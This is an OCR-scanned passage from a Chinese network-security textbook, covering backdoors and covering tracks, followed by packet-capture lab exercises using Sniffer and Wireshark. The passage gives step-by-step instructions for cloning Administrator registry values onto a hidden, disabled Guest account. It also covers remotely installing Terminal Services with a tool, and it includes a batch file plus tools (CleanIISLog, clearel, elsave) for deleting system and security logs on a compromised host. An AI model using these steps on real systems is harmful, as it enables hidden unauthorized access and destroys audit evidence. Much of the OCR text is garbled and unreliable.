XAO AMO SEV MB 


23838888; 


区 


i rg 

0 99 1:07:33 16 K 
8 00 0:00:53 22 K 
168 00 0:00:05 360 K 
196 00 0:00:29 103 K 
248 00 0:00:07 — 5,0] K 
20 00 0:00:03 — 4824 K 
300 00 0:00:00 2,484 K 
432 00 0:00:00 2,364 K 
460 00 0:00:00 3,112 K 
492 00 0:00:00 K 
500 00 0:00:00 — 3,30 K 
620 00 0:00:00 4,056 K 
636 00 0:00:01 4,332 K 
00 0:00:01 H K 

00 0:00:00 x 

00 0:00:00 K 

00 0:00:00 x 
[^] nm-m X 


Fen 


R 
5 


:Vpsu -p regedit -i 192 „ 


8-17 ”执行 psu 命令 


图 8-18 查看 对 应 的 键 值 
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PETER -oo 
SRO EVU RRO 帮助 (H) 


BE 
Ghi gb 


02 00 01 00 00 00 00 00 46 fd bf d9 3e I 
'00 00 00 00 a6 00 00 00 02 00 01 00 a6 


图 8-19 账户 配置 信息 

步骤 3: 复制 Administrator 配置 信息 

在 图 8-20 右边 栏目 中 的 下 键 值 中 保存 了 账户 的 密码 信息 ,双击 “000001F4” 目 录 下 键 值 
“F”, 可 以 看 到 该 键 值 的 二 进 制 信息 ,将 这 些 二 进 制 信息 全 选 ,并 复制 出 来 ,如 图 8-20 所 示 。 


DL IJ 
RRD Ka D meo 


mo QEL Eix 
SO HKEY. LOCAL. MACHINE 


00 00 a6 00 00 00 02 00 01 00 c 


图 8-20 $] Administrator 管理 员 配 置信 息 


步骤 4: 覆盖 Guest 用 户 的 配置 信息 


将 复制 出 来 的 信息 全 部 覆盖 到 “000001F5” 目 录 下 的 下 键 值 中 ,如 图 8-21 所 示 。 做 到 
此 ,Guest 就 可 以 登录 了 ,并 且 上 共有 超级 用 户 权限 。 但 Guest 在 计算 机 管理 的 用 户 中 显示 正 
常 ( 不 禁用 ) ,而 我 们 要 它 显示 禁用 。 

FRS: 导出 信息 


Guest 账户 已 经 具有 管理 员 权限 了 。 为 了 能 够 使 Guest 账户 在 禁用 的 状态 登录 ,下 一 
步 将 Guest 账户 信息 导出 注册 表 。 选 择 Users 目录 ,然后 选择 菜单 栏 “ 注 册 表 ”下 的 菜单 项 
“导出 注册 表 文 件 ”, 将 该 键 值 保 存 为 一 个 配置 文件 ,如 图 8-22 Bron 。 
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02 00 01 00 00 00 00 00 00 00 00 00 C 
'00 00 00 00 9c 00 00 00 02 00 01 00 9 


8-21 覆盖 Guest 用 户 的 配置 信息 


8-2 导出 键 值 


步骤 6: 删除 Guest 账户 信息 
打开 计算 机 管理 对 话 框 ,并 分 别 删 除 Guest 和 ”00001F5” 两 个 目录 ,如 图 8-23 所 示 。 


SHO FEV RRO MB) 


8-23 ”删除 Guest 账户 信息 
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步骤 7: 刷新 用 户 列表 
刷新 对 方 主机 的 用 户 列表 ,会 出 现 用 户 名 找 不 到 的 对 话 框 ,如 图 8-24 所 示 。 


[| 
|tw sv || c Gm DBIA 


Pi x 
ERAPR, HIR T ULTREIR: 


8-24 刷新 用 户 列表 


PRS: 导入 信息 

将 上 面 导出 的 信息 文件 ,再 导 人 注册 表 。 刷 新 用 户 列 表 后 ,就 不 会 出 现 图 8-24 的 对 话 
框 了 。 

步骤 9: 修改 Guest 账户 的 属性 

在 对 方 主机 的 命令 行 下 修改 Guest 的 用 户 属 性 ,注意 : 一 定 要 在 命令 行 下 。 

首先 修改 Guest 账户 的 密码 , 改 成 “123456”, 并 将 Guest 账户 开启 和 停止 ,如 图 8-25 
所 示 。 


:ynet user guest 123456 
成 功 完成 。 


iVnet user guest /active:yes 
功 完成 。 


:net user guest /active:no 
功 完 成 。 


图 8-25 ”修改 guest 账户 的 属性 


步骤 10: 查看 Guest 账户 属性 
查看 一 下 计算 机 管理 窗口 中 的 Guest 账户 ,发 现 该 账户 是 禁用 的 ,如 图 8-26 所 示 。 
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[EEEUCIJ E En 
| etw sv |o Gm | X i ES | (9 


管理 计算 机 ( 域 ) 的 内 置 账户 


莫名 访问 Intenet 信息 服务 的 内 ， 
. 局 动 [IS 进程 账号 局 动 进程 之 外 的 应 用 程序 的 Inter. 
qngl0 


TsInternetUser 这 个 用 户 账户 被 终 沈 服 务 所 使 用 。 


mL d 
lj usshmESU 
D ZEEN 

相克 可 敬 动 存储 


8-26 ”查看 guest 账户 的 属性 


步骤 11: 利用 禁用 的 Guest 账户 登录 
注销 退出 系统 ,然后 用 用 户 名 :“guest” ,密码 :“123456” 登 录 系统 ,如 图 8-27 所 示 。 


登录 到 Windows 


doy inteso 


用 PSUW: [fee 
mmp: m 


Microsoft. 


Ce ] m» |io»| 


8-27 ”用 Guest 账户 登录 


8.3 ”远程 终端 连接 


终端 服务 (Terminal Services) 是 Windows 操作 系统 自 带 的 ,可 以 远程 通过 图 形 界 面 操 
纵 服务 器 。 管 理 员 为 了 远程 操作 方便 ,默认 情况 下 服务 器 上 的 该 服务 一 般 都 是 开启 的 。 如 
图 8-28 所 示 。 利 用 该 服务 ,使 用 命令 和 基于 浏览 器 方式 可 以 连接 到 对 方 主机 。 


8.3.1 使 用 命令 连接 对 方 主机 


Windows 2000 和 Windows XP 自 带 的 终端 服务 连接 工具 都 是 mstsc. exe。 该 工具 中 
只 要 设置 要 连接 主机 的 TP 地 址 就 可 以 连接 ,如 图 8-29 所 示 。 

如 果 目 标 主机 的 终端 服务 是 启动 的 ,可 以 直接 登录 到 对 方 的 桌面 ,在 登录 框 输入 用 户 名 
和 密码 就 可 以 在 图 形 化 界面 中 操纵 对 方 主 机 了 ,但 速度 要 慢 些 。 
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jwro sso |e >am TOBIE)’ xe 
[z& 7 — ë 


计算 机 器 : [192.166 1.5 
用 户 名 : ARE 
当 悠 连接 时 将 向 悠 询问 苦 据 。 


Lima J( m jJ([ wmo ] [3o ») 


8-29 Windows XP 的 连接 界面 


8.3.2 Web 方式 远程 桌面 连接 


使 用 Web 方式 连接 ,该 工具 包含 几 个 文件 ,需要 将 这 些 文件 配置 到 IIS 的 站 点 中 去 , 程 
序列 表 如 图 8-30 所 示 。 具 体 使 用 步骤 请 参考 第 9 章 实验 三 十 二 。 


mí mí 国 


bluebarh.gf 。 bluebarvgf — connect.asp 
BE 66 a m 
wan2OO0r.gf — defsubhtm ^ merdp.ceb 。 winzD00Lgif 
图 8-30 Web 连接 文件 目录 
将 这 些 文件 复制 到 本 地 IIS 默认 Web 站 点 的 根 目 录 , 默 认 目 录 (c:\inetpub\wwwroot 


下 ), 如 图 8-31 所 示 ,注意 路 径 。 
然后 在 浏览 器 中 输入 "http://localhost "打开 连接 程序 ,如 图 8-32 所 示 。 在 服务 器 地 址 
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站 FT 
[wo zxwo|e-|&m|xmi miS» wu 


c:\program files\common files|systemlmsadc 
CAWINNT|webprinters. 


JJ LE d n web JE% - Microsoft Internet Explorer 
| ZWO ko 30800 RRA IAV Mio) 
| +m ---QdO Anr um gme D 2 wi 


Microsoft 
Windows 
远程 桌面 Web 连接 


律 入 要 使 用 的 远程 计算 机 的 和 名称 ,选择 连接 
的 屏 在 大 小 ， 骨 后 单 击 连接 


连接 页 打开 时 ， 悠 可 以 格 其 添加 到 ) 收 车 天， 192. 168. 1. 5| 


简化 跟 同一 台 计算 机 的 连接 。 大 小 
Z) 800 x 600 : 


E, 


图 8-32 连接 终端 服务 


文本 框 中 输入 对 方 的 IP 地 址 ,再 选择 连接 窗口 的 分 辩 率 , 单 击 * 连 接 ? 按 钮 连接 到 对 方 的 桌 
面 ,如 图 8-33 所 示 。 


8.3.3 用 命令 开启 对 方 的 终端 服务 


假设 对 方 没有 开启 终端 服务 ,我 们 用 上 面 的 方法 就 不 能 登录 了 ,可 以 使 用 软件 让 对 方 的 
终端 服务 开启 。 

使 用 工具 软件 djxyxs. exe, 可 以 给 对 方 安装 并 开启 该 服务 。 在 该 工具 软件 中 已 经 包含 
了 安装 终端 服务 所 需要 的 所 有 文件 ,该 文件 如 图 8-34 所 示 , 具 体 使 用 步骤 请 参考 第 9 章 实 
验 三 十 三 。 
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|emR---QUd ams uem doe Dama 


| 地 址 (0) [E] htp /focahostjconnect.asp?Server=192 168.1.5 &rW=8008rH=6008 


p 
mm | enw») 


8-33 ”在 浏览 器 下 的 登录 


图 8-34 ”开启 终端 服务 的 工具 软件 
步骤 1: 上 传 文件 到 指定 的 目录 
使 用 前 面 的 很 多 方法 (如 建立 信任 连接 ) 就 可 以 将 该 文件 上 传 并 复制 到 对 方 服务 器 的 
WINNT\ Temp 目录 下 (必须 放置 在 该 目录 下 ,和 否则 安装 不 成 功 ) ,如 图 8-35 所 示 。 


DAS c MAERA 
c . 
Siue BASF-6669 F 
C: WINNT\Temp 的 目录 
002-10-19 94:45 <DIR> 
002-10-19 94:45 <DIR> xw 
003-11-28 22:08 438 Config.ini 
0802-10-15 21:46 697,373 djxyxs.exe 

2 TER 697,811 F 

2 ^H 1.988,983,424 可 用 字 节 

zi 


8-35 ”文件 上 传 到 指定 的 目录 


步骤 2: 执行 djxyxs. exe 文件 

执行 djxyxs. exe 文件 ,该 文件 会 自动 进行 解压 并 将 文件 全 部 放置 到 当前 的 目录 下 。 执 
行 命令 查看 当前 目录 下 的 文件 列表 ,生成 了 1386 的 目录 ,这 个 目录 包含 了 安装 终端 服务 所 
需要 的 文件 。 最 后 执行 解压 出 来 的 azzd. exe 文件 ,将 自动 在 对 方 的 服务 器 上 安装 并 启动 终 
端 服务 ,就 可 以 用 前 面 的 方法 连接 终端 服务 器 了 ,如 图 8-36 所 示 。 
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: NIINNT NTenp?d jxuxs -exe 
XS cm DER 
POENI c 


gos unda z. 
C:WINNT\Temp 的 目录 4 


002-10-19 04:45 <DIR> 
002-10-19 04:45 <DIR> m 
(83-11-28 22:08 438 Config.ini 
(82-18-15 21:46 697.373 djxyxs.exe 
002-10-15 18:21 2,669 azzd.exe 
081-12-31 15:45 28,672 cq.exe 
982-99-18 17:21 62,952 sc.exe 
Q02-09-21 01:18 11,111 scuj-exe 
002-10-15 12:3? <DIR> 1386 
9002-09-28 16:82 29 mraz 
4002-09-24 03:52 294 azlj.dat 

8 个 文件 883,538 n 

3 个 目录 1.979.490.304 可 用 字 节 


8-36 ”安装 后 的 目录 列表 


8.4 网 络 隐 身 


我 们 想 要 隐身 ,不 被 对 方 的 管理 员 发 现 ,就 要 清除 系统 的 日 志 。 系 统 的 日 志文 件 是 一 些 
文件 系统 的 集合 ,依靠 建立 起 的 各 种 数据 的 日 志文 件 而 存在 。 日 志 对 于 系统 安全 的 作用 是 
显而易见 的 ,无 论 是 网 络 管理 员 还 是 黑客 都 非常 重视 日 志 , 一 个 有 经 验 的 管理 员 往往 能 够 迅 
速 通过 日 志 了 解 到 系统 的 安全 性 能 ,而 一 ABBIA WR A EA ERO GR RA yk ii ESO B o 
不 利 的 日 志 。 


8.4.1 清除 日 志 的 三 种 方法 


Windows 系统 的 日 志文 件 有 应 用 程序 日 志 、 安 全 日 志 、 系 统 日 志 等 ,它们 默认 的 地 址 
为 : WINNT\system32\LogFiles 目录 下 ,当然 有 的 管理 员 为 了 更 好 地 保存 系统 日 志文 件 ， 
往往 将 这 些 日 志文 件 的 地 址 进行 重新 的 定位 ,其 中 在 EventLog 下 面 有 很 多 子 表 , 在 里 面 可 
查 到 以 上 日 志 的 定位 目录 。 

如 果 用 户 想 要 清除 自己 系统 中 的 日 志文 件 ,首先 需要 用 管理 员 账 号 登录 Windows 系 
统 , 接 着 在 “控制 面板 ”中 进入 “管理 工具 ”, 再 双击 里 面 的 “事件 查看 器 ”*”。 然 后 选择 打开 我 们 
需要 清除 的 日 志文 件 , 比 如 用 户 想 清除 安全 日 志 , 可 以 右 击 “安全 性 ”选项 ,在 弹出 的 快捷 菜 
单 中 选择 “属性 ”命令 。 接 下 来 在 弹出 的 对 话 框 中 , 单 击 下 面 的 “清除 日 志 ” 按 钮 就 可 以 清除 
了 。 但 是 全 部 删除 文件 以 后 ,一 定 会 引起 管理 员 的 怀疑 ,只 需要 在 该 Log 文件 中 删除 所 有 
自己 的 记录 就 可 以 了 。 

使 用 工具 软件 CleanIISLog. exe 可 以 做 到 这 一 点 ,首先 将 该 文件 复制 到 日 志文 件 所 在 
目录 ,然后 执行 命令 “CleanIISLog. exe ex031108. log 192. 168. 1. 10”, 第 一 个 参数 
ex031108. log 是 日 志文 件 名 ,文件 名 的 后 6 位 代表 年 月 日 ,第 二 个 参数 是 要 在 该 Log 文件 
中 删除 的 IP 地 址 ,也 就 是 自己 的 IP 地 址 。 先 查找 当前 目录 下 的 文件 ,然后 做 清除 的 操作 ， 


170 计算 机 网 络 安全 与 实验 教程 


整个 清除 的 过 程 如 图 8-37 所 示 。 


k: TN 
Wz c 中 的 若是 wIN2000 
卷 的 序列 号 是 3778-1809 


C:\WINNT\systen32\LogFiles\W3SUC12 的 目录 


3-09-10 67:11p «DIR» 

3-09-10 67:11P <DIR> 

3-09-10 09:34p 485 ex030910.109 
3-11-30 10:13p 3,679 ex031108.109 
23-81-31 1! - 131,072 CleanlISLog.exe 


3 个 文件 135.236 "Ed 
2 个 目录 194.887.808 可 用 守节 
天 :MuINNTNeystem32VLogFiles\Vy3SUC12)CleanIISLog .exe ex031108.109 172.18.25.110 
lcleanlIsLog Uer 0.1. by Assassin 2001. A11 Righto Reserved. 
— Step 1111212222 
topping Service w3suc 
Vice w3ouc Stopped 
topping Service msftpsuc. 
Service Failed - ,1960 
Step 2: 
108.L0G...Done (0000) Recorde Removed 


Li | 


:\WINNT\systen32\LogFileo\W3SUC12> Fa 
* "| 


图 8-37 删除 指定 的 IP 地 址 的 内 容 


这 是 对 于 本 地 的 日 志文 件 的 清除 。 但 是 如 果 是 一 名 黑客 ,入 侵 系 统 成 功 后 第 一 件 事 也 
是 清除 日 志 , 除 了 用 上 面 的 方法 清除 日 志 外 ,还 可 以 自己 编写 批 处 理 文件 来 解决 。 


@del c:\winnt\system32\logfiles\*.* 

@del c:\winnt\system32\config\ * . evt 

@del c:\winnt\system32\dtclog\ * . * 

@del c:\winnt\system32\ * . log 

@del c:NwinntVsystem32N * . txt 

@del c:\winnt * .txt 

@del c:Nwinnt * . log 

@del c:\dellog. bat 

把 上 面 的 内 容 保存 为 dellog. bat 备用 。 接 着 通过 IPC 共享 连接 到 远程 计算 机 上 ,将 这 
个 批 处 理 文件 上 传 到 远程 计算 机 系统 并 执行 , 即 可 清除 该 机 上 的 日 志文 件 。 

另外 ,清除 日 志文 件 还 可 以 借助 第 三 方 软件 ,比如 小 榕 的 elsave. exe 就 是 一 款 可 以 清除 
远程 以 及 本 地 系统 中 系统 日 志 、 应 用 程序 日 志 、 安 全 日 志 的 软件 。elsave. exe 使 用 起 来 很 简 
单 , 首 先 还 是 利用 管理 员 账 号 建立 IPC 连接 ,接着 在 命令 行 下 执行 清除 命令 ,这 样 就 可 以 删 


除 这 些 系 统 中 的 网 络 日 志文 件 。 


8.4.2 清除 主机 日 志 


主机 日 志 包 括 三 类 的 日 志 : 应 用 程序 日 志 、 安 全 日 志和 系统 日 志 。 可 以 在 计算 机 上 通 


过 控制 面板 下 的 “事件 查看 器 ”查看 日 志 信息 ,如 图 8-38 所 示 。 
使 用 工具 软件 clearel. exe, 可 以 方便 地 清除 系统 日 志 。 首 先 将 该 文件 上 传 到 对 方 主机 ， 
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ra 一 --inlxi 
|mfo sw |ce +m s OBA 


a [226S 7TH 


AMER 2003-11-30 — 20:42:46 
GARFE 2003-11-30 — 20:42:40 


2003-11-30 
2003-11-30 
2003-11-30 
2003-11-30 
2003-11-30 
2003-11-30 


图 8-38 查看 日 志 
然后 删除 这 三 种 日 志 。 命 令 格 式 为 : 
Clearel System 删除 系统 日 志 
Clearel Security 删除 安全 日 志 
Clearel Application 删除 应 用 程序 日 志 
Clearel All 删除 全 部 


命令 执行 的 过 程 如 图 8-39 所 示 。 


:MClearel System 
:\Clearel Security 
:\>Clearel Application 
:\Clearel A11 


A 


图 8-39 清除 日 志 
执行 完毕 后 ,再 打开 事件 查看 器 ,发现 日 志 记 录 都 已 经 空 了 ,如 图 8-40 所 示 。 


ENTE [- T5117] m 


[EHR/KEE 0 个 事件 


图 8-40 查看 清除 后 的 日 志 
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习 题 8 

一 、 填空 题 

1. 后 门 分 为 s " 和 ,最 著名 的 后 门 程序 是 

2.“ 冰 河 ” 包 含 两 个 程序 文件 ,一 个 是 , 另 一 个 是 

3. RTCS. vbe 工具 软件 的 功能 是 o 

4. NTLM 身份 验证 选项 有 三 个 值 。 默 认 是 ,用 Telnet 登录 时 ,用 的 值 
是 或 

5. 记录 管理 员 口 令 修改 过 程 的 软件 是 

6. Windows 系统 的 日 志文 件 有 和 

7. 删除 全 部 日 志 的 命令 是 8 

二 、 简 答题 


1. 简 述 木马 由 来 ,并 简 述 木 马 和 后 门 的 区 别 与 联系 。 
2. 如 何 删 除 系统 日 志 、 安 全 日 志 、 应 用 程序 日 志 ? 
3. 如何 开启 要 攻击 机 器 的 终端 服务 ? 


第 四 部 分 x 


第 9 章 实 验 


本 章 包括 34 个 实验 ,要 很 好 的 完成 这 些 实验 ,注意 操作 系统 的 选择 ,做 实验 的 目的 就 是 
更 好 的 理解 相应 的 理论 知识 。 


实验 一 ”Sniffer 和 Wireshark 工具 软件 的 使 用 


1. 实验 目的 

(1) 掌握 和 了 解 网 络 监 听 抓 包 软件 Sniffer 和 Wireshark 的 基本 应 用 ,熟悉 它们 的 基本 操作 。 

(2) 熟悉 Sniffer 和 Wireshark 一 些 常用 的 命令 和 设置 ,体会 网 络 安 全 的 重要 性 。 

2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 192. 168. 2. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 2. 2。 

抓 包 软 件 Sniffer4. 7. 5/ Wireshark-win32-1. 4. 9 中 文 版 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

3. 实验 步骤 

用 Sniffer 31.6 : 

COD 安装 : 在 服务 器 上 双击 如 图 9-1 所 示 的 SnifferPro_4_70_530. exe 安装 ,安装 界面 
如 图 9-2 所 示 ,安装 过 程 如 图 9-3 所 示 ,在 安装 过 程 中 
必须 输入 一 个 带 @ 的 E-mail 和 一 个 SN 的 序列 号 ,如 Ext ES 
图 9-4 和 图 9-5 所 示 ,其 他 内 容 按照 要 求 输入 即 可 , 安 E 
装 完成 后 需要 重新 启动 计算 机 。 Hi E Suite MSSE 


F, Sniffer Portable 4.7.5 — InstallShield Wizard 


Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


The rotated wawdTH) d heip natal Sniffer Portabie 
7,5n vo computer. To contnue, dick 


图 9-2 Sniffer 的 安装 界面 
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Sniffer Pro 4.7.5 - Setup. 


图 9-3 安装 过 程 


E Sniffer Pro User Registration 


pa » Enter your ame and information ?* - Indicates a 
* Eirst Name 


* past Name: [chinabeijing 


* Business 


Education 


[12348qq. co 


图 9-4 输入 带 @ 的 E-mail 


(2) 启动 : 启动 Sniffer 的 界面 如 图 9-6 所 示 , 抓 包 之 前 必须 先 设置 要 抓 取 的 数据 包 的 
类 型 。 选 择 主 菜单 Capture 下 的 Define Filter( 抓 包 过 滤器 ) 菜 单项 ,如 图 9-6 所 示 。 

在 出 现 的 Define Filter 对 话 框 中 ,选择 Address 选项 卡 ,窗口 中 需要 修改 两 个 地 方 。 在 
Address 下 拉 列 表 中 ,选择 抓 包 的 类 型 为 IP, 在 Station 1 下 输入 客户 机 的 IP 地 址 192. 168. 
2.1, 在 Station 2 下 输入 服务 器 的 IP 地 址 192. 168. 2.2, 如 图 9-7 Bros. 

设置 完毕 后 , 单 击 该 窗口 的 Advanced 选项 卡 ,选中 要 抓 包 的 类 型 , 拖 动 滚动 条 找到 IP. 
项 ,将 IP 和 ICMP 选中 ,如 图 9-8 所 示 。 


$93 X X 177 


fee let us know where you [Magazine va 7] 
heard about this product. Epsioe og 


Do you wish to receive 


Announcements about this 
product? 


May we share your name with 
other companies that use RAI 
products? 


* Sniffer Serial Number 


mm | 
图 9-5 输入 序列 号 


Sniffer Portable - Local, Ethernet (Line speed at 10 Wbps) 


Display Tools Database Window Help 


Capture Panel 


Select EY 


Trigger Setup. 


9-6 Sniffer 主 界面 


Summary Address | Data Pattern | Advanced | Puffer | 
Máress Known Address: Mragable) 


Any 
E By Brosdcast/Multicast Address 
QD Address Bock 


He S 19216822 


图 9-7 选择 抓 包 地 址 


向 下 拖 动 滚动 条 ,将 TCP 和 UDP 选中 ,再 把 TCP 下 面 的 FTP 和 Telnet 两 个 选项 选 
中 ,如 图 9-9 所 示 。 

继续 拖 动 滚动 条 ,选中 UDP 下面 的 DNS, 如 图 9-10 所 示 。 这 样 Sniffer 的 抓 包 过 滤器 
就 设置 完毕 了 。 
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Define Filter — Capture 
Summary | Address | Data Pattern Advanced | Buffer | 
-WY r 


1117171371171 


d 


WB o | Profiles. 


Define Filter — Capture 


Summary | Address | Data Pattern Advanced | Buffer | 


T TEN m 
[2 


LJ Profiles.. 


9-9 选中 FTP 和 Telnet 


Define Filter - Capture 


Summary | Address | Data Pattern Advanced | Buffer | 


图 9-10 选中 DNS 
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(3) 抓 包 : 首先 选择 菜单 栏 Capture 下 的 Start 启动 抓 包 ,如 图 9-11 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Nbps) 


Eile Monitor PEIEEEE Lisplsy Lools Database Window Help 


Capture Panel 


Define Filter. 
Select Filter 


Trigger Setup. 


图 9-11 启动 抓 包 


然后 在 客户 机 开始 菜单 下 运行 CMD 命令 ,进入 DOS 窗口 ,在 客户 机 DOS 窗口 中 ping 
虚拟 机 服务 器 ,如 图 9-12 所 示 。 


gs \Adninistrato; 
bytes of data: 
ime =4ns 


2 time<ins 


ime<ins 


d trip tine 
Maximum 


ettings Vidnin 


图 9-12 ”从 服务 器 向 客户 机 发 送 数据 包 


ping 指令 执行 完毕 后 ,选择 菜单 栏 Capture 下 的 Stop and Display( 停 止 并 显示 ) 或 单 击 
按钮 ,如 图 9-13 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 10 Wbps) 
File Monitor PESSA Display Iools Database Windev Help 


Trigger Setup. 


图 9-13 停止 抓 包 并 显示 结果 
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在 出 现 的 窗口 中 选择 Decode 选项 卡 , 可 以 看 到 数据 包 在 两 台 计 算 机 之 间 的 传递 过 程 
如 图 9-14 所 示 。 


Bils paite Caime Dulu Dls Itme Pade ely 


slul alaja Sipa 
au a -|cimzietaea| z e | 


[iNe [Sinn [Souce nse (777 7 cM 7 CONNU 7T 2. ONU 7 NN 78 Te 


9314 数据 包 传递 过 程 
用 Wireshark 抓 包 : 


(1) 在 服务 器 上 安装 Wireshark: 双击 如 图 9-15 所 示 的 wireshark-win32-1. 4.9 中 文 
版 . exe 安装 。 全 部 按照 默认 安装 ,如 图 9-16、 图 9-17 所 示 。 


È wireshark_cn. zip 一 WinRAR 


文件 @) $90 IAG KERO Xo EMW 


TTI 


E “| 性 wireshwk_cn zip - ZIF 压缩 文件 ， 解 包 大 小 为 19,903, 865 FP 
£^ o 
©.. 


< 


E3ec PAIRS 19,903,865 FB (0 个 文件 ) 


Sit 19,903,885 FB (1 个 文件 ) 
图 9-15 安装 文件 


(2) 启动 Wireshark: 安装 后 直接 启动 。 在 菜单 栏 * 抓 包 ? 选 项 中 选择 “ 抓 包 参数 选择 ”， 
如 图 9-18 所 示 , 设 置 抓 包 选 项 ,如 图 9-19 所 示 。 
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Wireshark 1.4.9haochj (32-bit) Setup 


Choose install Location 
Choose the folder in which to install Wireshark 1.4.9haechj (32-bit) 


Choose a drectory in which to install Wireshark. 


9-16 选择 安装 的 路 径 


Wireshark 1.4.9haochj (32-bit) Setup 


Installation Complete. 
Setup was completed successfully. 


Competed 


Output folder: C: Program Fies Wireshark 
Extract: mergecap.exe 

Extract: mergecap.htmi 

Output folder: C: Program Fies Wireshark 
Extract: capinfos.exe 

Extract: capinfos. hti 

Output folder: C:\Program Fies Wireshark 
Extract: rawshark exe 

Extract: rawshark html 

Output folder: C: Program Fies Wreshark 
Extract: user gude.chm 

Completed 


9-17 安装 过 程 


The Wireshark Network Analyzer 

文件 多 ) MaD WEB) 定位 @ [Sl S000 wito cu IA «Rp 
waa a Ex Bep wn DB eeam unmm- >» 
me 


È 开始 G) Ctrl+E 


图 9-18 选择 抓 包 参数 


G) 抓 包 和 监听 : 单 击 “ 抓 包 ” 下 的 “开始 ”, 我 们 就 可 以 抓 到 所 有 的 数据 包 了 。 在 抓 包 
过 滤 中 填写 我 们 想得到 的 数据 包 ( 比 如 TCP), 然 后 单 击 右面 的 “应 用 "就 可 以 显示 抓 到 的 
TCP 的 数据 包 了 ,如 图 9-20 所 示 。 
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T Fireshark: (21 

抓 包 

接口 : 本地 v (AND FCIET Family Ethernet Adapter: \Devi ce\NPF_(DISFAIA] v | 
了 地 址 -192 168.2 1 

馆 路 屋 头 类 型 -| Ethernet v 

在 混乱 模式 下 抓 包 

CO MRA- NG 格式 的 数据 包 实验 ) 
m A bytes 


HAEC) [E3] 
抓 包 文件 Zum 


文件 [ma] 器 gj 更 新 包 列表 
口 8S3 0D 


mSaxad Š megabyte (s) 


[v] 9&1 SREE) 
[7] BREITER BORA 


EFW 
[7] fter fimc e T MIT QD 


O fcire mata TN QD 


允许 便 用 传输 名 于 解析 D 


intenet P x 6 (222.30 


Transmescn Contr Prorcd, sre Port r-sessen (4594 


15.5.2% " 


Dst 1 16.32 (115.25 2 
JÀ. Dst Port: http (80), Sea. 0, Len: O 


ema m IYE nipas o ERTE himi: 


9-20 ”得 到 TCP 的 数据 包 


思考 题 : 


1. 使 用 Sniffer 抓 取 主机 到 虚拟 机 或 者 到 其 他 计算 机 的 数据 包 , 并 分 析 。 
2. 写 出 两 种 抓 包 软件 在 使 用 方面 的 不 同 。 
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实验 二 “运用 ping HR IP 头 结构 


1. 实验 目的 

(1) 认识 ping 命令 ,了 解 和 掌握 IP 头 结构 的 含义 ,学 习 IP 头 结构 ,查看 IP 数据 包 的 结构 。 

(2) 了 解 IP 协议 在 网 络 层 的 应 用 。 

2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 192. 168. 2. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168. 2. 2。 

抓 包 软 件 Sniffer4. 7. 5/ Wireshark-win32-1. 4. 9 中 文 版 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

3. 实验 步骤 

CD. 启动 并 设置 抓 包 软件 Sniffer( 参 照 实验 

(2) 开始 抓 包 。 在 主机 开始 菜单 下 运行 CMD 命令 ,进入 DOS 窗口 ,在 客户 机 DOS 界 
面 下 ping 虚拟 机 服务 器 ,如 图 9-21 所 示 


- Sniffer 设置 ) 


BSE 


ocuments and Settings\Adninistrator ping 192.168.2.2 


Pinging 192.168.2.2 vith 32 bytes of data: 


2 tineCins TTL=128 


cs for 192.168.2.2: 
Sent = 4, Received = 4, Los MK loss), 
ound trip times in milli 

Minimum ~ Ons, Maxinun = dns, Average = ins 


C:\Documents and Settings hdninistrator》 


图 9-21 从 主机 向 虚拟 机 发 送 数据 包 
(3) 停止 并 显示 。 在 出 现 的 窗口 中 选择 Decode 选项 卡 ,可 以 看 到 数据 包 在 两 台 计 算 机 
之 间 的 传递 过 程 , 如 图 9-22 所 示 。 
Sniffer 已 将 ping 命令 发 送 的 数据 包 成 功 获取 。 我 们 可 以 得 到 IP 头 结构 ,如 图 9-23 所 
m. IP 头 结构 的 所 有 属性 都 在 报头 中 显示 出 来 ,可 以 看 出 实际 抓 取 的 数据 报 和 理论 上 的 数 


据 报 一 致 


184 计算 机 网 络 安全 与 实验 教程 


mc 


slal elajas) 到 Fa —— 


=| 版 本 号 


标志 位 、 没 有 使 用 IP 协 议 、 DF 为 0 表示 
要 分 段 、MF 为 0 表示 没有 进一步 分 段 、 
分 段 偏 移 

生存 时 间 


rrect) 


~ [192.168.2.1 PP suh 
* [192 168522 1 目标 地 址 


图 9 23 IP 头 结构 解析 


思考 题 : 
1. 分 析 你 抓 到 的 IP 头 结构 。 包 括 版 本 号 、 头 长 度 、 服 务 类 型 等 。 
2. 抓 取 Telnet 的 数据 报 , 并 简要 分 析 IP 头 的 结构 。 


实验 三 ”运用 FTP 命令 抓 取 TCP 头 结构 


1. 实验 目的 


CD 掌握 FTP 服务 器 的 搭建 方法 和 FTP 的 使 用 。 
(2) 学 习 传输 控制 协议 TCP, 分 析 TCP 的 头 结 构 和 TCP 的 工作 原理 ,观察 TCP 的 “三 
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次 握手 ”和 “四 次 挥手 ”。 

2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000/ Windows XP,IP 地 址 为 192. 168. 2. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 192. 168. 2. 2, 

抓 包 软 件 Sniffer4. 7. 5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

3. 实验 步骤 

COD 首先 在 服务 器 上 搭建 FTP 服务 ,如 图 9-24 所 示 。 选 择 默 认 的 FTP 站 点 , 右 击 选择 
属性 ,如 图 9-25 所 示 。 


H 
3 
E 
g 
H 附 
E 


图 9-24 打开 Internet 服务 管理 器 


